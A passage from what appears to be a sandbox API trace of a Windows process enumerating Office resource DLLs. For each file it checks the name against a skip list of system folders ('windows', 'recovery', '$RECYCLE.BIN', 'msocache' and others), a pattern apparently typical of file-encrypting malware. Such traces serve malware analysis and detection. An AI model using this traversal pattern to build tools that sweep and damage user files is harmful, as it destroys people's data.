hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d800, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0126.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0126.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.286] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4ba375b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4ba375b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5478, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.286] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0126.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0126.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0126.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d698, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0126.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0126.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.287] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d920, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dba8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dff8 [0126.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0126.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.288] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf10a1263, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf12910b6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d920, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0126.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d578, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0126.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244840 [0126.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0126.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.288] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71070, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d578, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0126.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244840 | out: hHeap=0x1e0000) returned 1 [0126.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.289] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1e0a643, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14ac8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.289] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dde8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d728, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0126.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.290] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc47ce76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc47ce76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc646a83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaad0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0126.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.290] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: 